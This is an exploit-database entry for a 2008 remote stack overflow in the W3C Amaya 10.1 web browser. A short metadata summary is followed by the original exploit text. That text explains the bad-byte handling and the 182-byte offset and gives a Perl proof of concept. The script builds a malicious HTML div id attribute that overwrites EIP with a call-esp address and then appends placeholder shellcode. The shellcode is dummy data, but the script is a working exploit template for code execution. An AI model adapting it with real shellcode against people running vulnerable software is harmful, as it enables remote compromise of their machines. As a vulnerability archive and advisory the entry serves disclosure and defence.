W3C Amaya 10.1 Web Browser Amaya (id) Remote Stack Overflow Vulnerability

vendor:

Amaya

by:

r0ut3r

7.5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Amaya

Affected Version From: 10.1

Affected Version To: 10.1

Patch Exists: YES

Related CWE: N/A

CPE: a:w3c:amaya:10.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

W3C Amaya 10.1 Web Browser Amaya (id) Remote Stack Overflow Vulnerability

The application fails to correctly process certain bytes, such as 0x9c becoming 0x9cc2. After reviewing the source code, the below function modifies the shellcode: Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest). The max value which can be used is 0x1fffff. The 'id' variable of a tag contains a buffer overflow, which will not overflow with normal alphanumeric characters. To fill the buffer, 'A/' must be repeated 91 times. The ESP points to data after EIP. A proof of concept is provided in the text.

Mitigation:

Ensure that the application is updated to the latest version and that all security patches are applied.

Source

Exploit-DB raw data:

#            W3C Amaya 10.1 Web Browser
#
# Amaya (id) Remote Stack Overflow Vulnerability
#
# Written and discovered by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/41/
# ------------------------------------------------------
#
# Shellcode notes: 
# The application fails to correctly process certain bytes: 
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf 0xeb). 
#
# After reviewing the source code, the below function modifies the
# shellcode:  
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1fffff <-- Thanks Luigi!
# ------------------------------------------------------
#
# The "id" variable of a tag contains a buffer overflow: 
# <div id=" 93*'A/' ">r0ut3r</div>
#
# The application will not overflow with normal alphanumeric characters. 
# To fill the buffer I had to use "A/" repeated 91 times. Therefore buffer length is: 
# 91 * 2 = 182 + 4
#
# [junk] + [eip] +     [shellcode]
#  182   +   4   +  sizeof(shellcode)
#
# ESP points to data after EIP. 
#
# "id" variable Proof of concept: 
#!/usr/bin/perl

use warnings;
use strict;

my $shellcode = 'C' x 350;

# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data   =       '<div id="' .
                        'A/' x 91 .
                        "\x53\x5f\x03\x7d" . # eip (ESP points to stuff after RET, so shellcode)
                        $shellcode . 
                        '">test</div>';
print $data;

# milw0rm.com [2008-11-24]